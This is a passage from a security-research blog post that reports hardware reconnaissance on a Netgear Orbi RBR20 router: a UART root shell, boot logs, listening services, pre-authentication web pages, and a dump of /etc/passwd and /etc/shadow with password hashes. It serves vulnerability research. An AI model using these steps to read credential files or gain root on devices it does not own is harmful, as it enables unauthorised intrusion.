<p>The paths to some of these binaries are provide here (these are paths on the root filesystem of the device):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/sbin/net-cgi
/usr/sbin/soap-api
/usr/sbin/miniupnpd
</code></pre></div></div>

<p><br /></p>

<h2 id="uart-serial-console-access">UART Serial Console Access</h2>

<p>After losing Telnet access when my device was inintentionally upgraded, I moved on to seeing if I could get access to a console over serial. My device still had pins connected as shown below so this immediately caught my attention as being a potential serial interface. I found info online for other Orbi models that showed the correct pin layout.</p>

<p>Starting with the pin closes to the RJ45 port:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">GND, RX, TX, power (not needed)</code></li>
</ul>

<p><img src="/assets/images/orbi-hw3.png" alt="pins" /></p>

<p>I connected to these pins on the board using an FTDI serial-USB converter in the 3.3v configuration at 115200 baud (8N1) and successfully dropped into a root shell.</p>

<h3 id="bonus-greatfet-one-uart-setup">Bonus: GreatFET ONE UART Setup</h3>

<p>After confirming this worked with the FTDI converter, I decided to use my GreatFET ONE board moving forward. This is an interesting hardware hacking tool I bought some time ago to begin experimenting with USB fuzzing/analysis. It allows for USB proxying and emulation of various USB devices (keyboard, storage, etc) through a programmatic interface using Python.</p>

<p>I remembered that it can also be used for serial/UART connections but had a difficult time finding any good documentation or examples of doing this. Eventually, I was able to get this working by connecting pins to the following ports on the GreatFET’s J1 bank of I/O pins (see full pin table <a href="https://github.com/greatfet-hardware/azalea">here</a>):</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">1:GND</code></li>
  <li><code class="language-plaintext highlighter-rouge">33:RX</code></li>
  <li><code class="language-plaintext highlighter-rouge">34:TX</code></li>
</ul>

<p>I then used the built-in UART script provided by the <code class="language-plaintext highlighter-rouge">greatfet</code> library/CLI tool:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>greatfet uart <span class="nt">--wait</span> <span class="nt">-P</span> none <span class="nt">-N</span>
</code></pre></div></div>

<p><br /></p>

<h2 id="recon-dump">Recon Dump</h2>

<h3 id="boot-log-highlights">boot log highlights</h3>

<p><strong>CPU Info:</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Booting Linux on physical CPU 0x0
Linux version 3.14.77 (lijun.xue@cnshadnicp03.deltaos.corp) (gcc version 5.2.0 (OpenWrt GCC 5.2.0 r6043) ) #1 SMP PREEMPT Fri Jun 4 19:11:51 CST 2021
CPU: ARMv7 Processor [410fc075] revision 5 (ARMv7), cr=10c5387d
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine model: Qualcomm Technologies, Inc. IPQ40xx/AP-DK04.1-C1
PERCPU: Embedded 8 pages/cpu @dfbc7000 s8448 r8192 d16128 u32768
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 125952
</code></pre></div></div>

<p><strong>Kernel memory layout:</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Virtual kernel memory layout:
    vector  : 0xffff0000 - 0xffff1000   (   4 kB)
    fixmap  : 0xfff00000 - 0xfffe0000   ( 896 kB)
    vmalloc : 0xe0800000 - 0xff000000   ( 488 MB)
    lowmem  : 0xc0000000 - 0xe0000000   ( 512 MB)
    pkmap   : 0xbfe00000 - 0xc0000000   (   2 MB)
    modules : 0xbf000000 - 0xbfe00000   (  14 MB)
      .text : 0xc0208000 - 0xc073e1fc   (5337 kB)
      .init : 0xc073f000 - 0xc076a100   ( 173 kB)
      .data : 0xc076c000 - 0xc07abb38   ( 255 kB)
       .bss : 0xc07abb38 - 0xc0804680   ( 355 kB)
SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
Preemptible hierarchical RCU implementation.
</code></pre></div></div>

<h3 id="system-users">System Users</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@RBR206:/# cat /etc/passwd
root:$5$BChRWDkyPlaOVrGS$/kQaqSCIWiiM36IuwS5phJHhpzdnP9osEVONs4CZa3C:0:0:root:/tmp:/bin/ash
guest:*:65534:65534:guest:/tmp/ftpadmin:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
admin:x:1:1:Linux User,,,:/tmp/ftpadmin:/bin/ash

root@RBR206:/# cat /etc/shadow 
guest::10957:0:99999:7:::
admin:$1$QPu5pxAi$ITZQ21EZg7P2B48TsiQwg1:18612:0:99999:7:::
</code></pre></div></div>

<h3 id="listening-processes-netstat--lp">Listening Processes (<code class="language-plaintext highlighter-rouge">netstat -lp</code>)</h3>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@RBR20:/# netstat <span class="nt">-lp</span>
Active Internet connections <span class="o">(</span>only servers<span class="o">)</span>
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.13.13.1:7272         0.0.0.0:<span class="k">*</span>               LISTEN      15890/circled
tcp        0      0 0.0.0.0:www             0.0.0.0:<span class="k">*</span>               LISTEN      8278/lighttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:<span class="k">*</span>               LISTEN      16137/dnsmasq
tcp        0      0 0.0.0.0:https           0.0.0.0:<span class="k">*</span>               LISTEN      8278/lighttpd
tcp        0      0 :::www                  :::<span class="k">*</span>                    LISTEN      8278/lighttpd
tcp        0      0 :::56688                :::<span class="k">*</span>                    LISTEN      7298/miniupnpd
tcp        0      0 :::domain               :::<span class="k">*</span>                    LISTEN      16137/dnsmasq
tcp        0      0 :::https                :::<span class="k">*</span>                    LISTEN      8278/lighttpd
udp        0      0 10.13.13.1:38407        0.0.0.0:<span class="k">*</span>                           7298/miniupnpd
udp        0      0 10.13.13.1:23           0.0.0.0:<span class="k">*</span>                           12782/telnetenable
udp        0      0 0.0.0.0:domain          0.0.0.0:<span class="k">*</span>                           16137/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:<span class="k">*</span>                           2646/udhcpd
udp        0      0 0.0.0.0:tftp            0.0.0.0:<span class="k">*</span>                           8334/tftpd-hpa
udp        0      0 0.0.0.0:1900            0.0.0.0:<span class="k">*</span>                           7298/miniupnpd
udp        0      0 0.0.0.0:45226           0.0.0.0:<span class="k">*</span>                           5777/net-scan
udp        0      0 10.13.13.1:5351         0.0.0.0:<span class="k">*</span>                           7298/miniupnpd
udp        0      0 :::domain               :::<span class="k">*</span>                                16137/dnsmasq
</code></pre></div></div>

<h3 id="mount-points">Mount Points</h3>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@RBR20:~# mount
rootfs on / <span class="nb">type </span>rootfs <span class="o">(</span>rw<span class="o">)</span>
/dev/root on /rom <span class="nb">type </span>squashfs <span class="o">(</span>ro,relatime<span class="o">)</span>
proc on /proc <span class="nb">type </span>proc <span class="o">(</span>rw,nosuid,nodev,noexec,noatime<span class="o">)</span>
sysfs on /sys <span class="nb">type </span>sysfs <span class="o">(</span>rw,nosuid,nodev,noexec,noatime<span class="o">)</span>
tmpfs on /tmp <span class="nb">type </span>tmpfs <span class="o">(</span>rw,nosuid,nodev,noatime<span class="o">)</span>
overlayfs:/tmp/overlay on / <span class="nb">type </span>overlayfs <span class="o">(</span>rw,relatime,lowerdir<span class="o">=</span>/,upperdir<span class="o">=</span>/tmp/overlay<span class="o">)</span>
tmpfs on /dev <span class="nb">type </span>tmpfs <span class="o">(</span>rw,nosuid,relatime,size<span class="o">=</span>512k,mode<span class="o">=</span>755<span class="o">)</span>
devpts on /dev/pts <span class="nb">type </span>devpts <span class="o">(</span>rw,nosuid,noexec,relatime,mode<span class="o">=</span>600<span class="o">)</span>
debugfs on /sys/kernel/debug <span class="nb">type </span>debugfs <span class="o">(</span>rw,noatime<span class="o">)</span>
ubi0:vol_ntgr on /tmp/mnt/ntgr <span class="nb">type </span>ubifs <span class="o">(</span>rw,relatime<span class="o">)</span>
ubi0:vol_arlo on /tmp/dal <span class="nb">type </span>ubifs <span class="o">(</span>rw,relatime<span class="o">)</span>
ubi0:vol_devtable on /tmp/device_tables <span class="nb">type </span>ubifs <span class="o">(</span>rw,relatime<span class="o">)</span>
ubi0:vol_circle on /tmp/mnt/circle <span class="nb">type </span>ubifs <span class="o">(</span>rw,relatime<span class="o">)</span>
</code></pre></div></div>

<h3 id="web-servers">Web Servers</h3>

<p><strong>Web servers will be discussed in further detail in a future post but for now I’ll just cover some of the basics.</strong></p>

<p>The following binaries provide an HTTP server or otherwise involved in handling HTTP-formatted requests.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/sbin/lighttpd
/usr/sbin/net-cgi
/usr/sbin/soap-api
/www/cgi-bin/proccgi
</code></pre></div></div>

<ul>
  <li><strong>lighttpd</strong> is the main user-facing web server process the handles requests, mostly wraps around net-cgi</li>
  <li><strong>net-cgi</strong> handles the bulk of admin functionality that reads underlying system configs and makes config changes
    <ul>
      <li>net-cgi responses are typically embedded within responses returned by lighttpd within iframes or as raw data written back to the FD.</li>
    </ul>
  </li>
  <li><strong>soap-api</strong> is the binary called by the CGI handler to handle SOAP requests. All requests to <code class="language-plaintext highlighter-rouge">/soapapi.cgi</code> or <code class="language-plaintext highlighter-rouge">/soap/server_sa</code> are routed to this binary. It is a CGI application that reads most of the request data from environment variables (it expects that parent process to set all of this up prior to spawning soap-api).</li>
</ul>

<p>Only the following pages are accessible prior to authentication:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/unauth.cgi
/passwd_reset.cgi
/basic_home_result.txt
/debuginfo.htm
</code></pre></div></div>

<p><br /></p>

<h2 id="wrapping-up">Wrapping Up</h2>
<p>Okay, that was a ton of info.</p>

<p>As mentioned above, future posts will dive deeper into specific areas of interest and include some of my findings in these areas.</p>

<h3 id="references">References</h3>

<ul>
  <li><a href="https://github.com/insanid/netgear-telenetenable">netgear-telnetenable Python script</a></li>
  <li><a href="https://fccid.io/PY317400402">Orbi RBR20 FCCID.io page</a></li>
  <li><a href="https://kb.netgear.com/2649/NETGEAR-Open-Source-Code-for-Programmers-GPL">Netgear GPL Downloads page</a></li>
  <li><a href="https://hackaday.com/2019/07/02/hands-on-greatfet-is-an-embedded-tool-that-does-it-all/">GreatFET One</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="research" /><category term="bug-hunting" /><category term="vulnerability-research" /><category term="orbi" /><category term="netgear" /><category term="iot" /><summary type="html"><![CDATA[a data dump of findings and notes taken while hunting for vulnerabilities on the Netgear Orbi.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry></feed>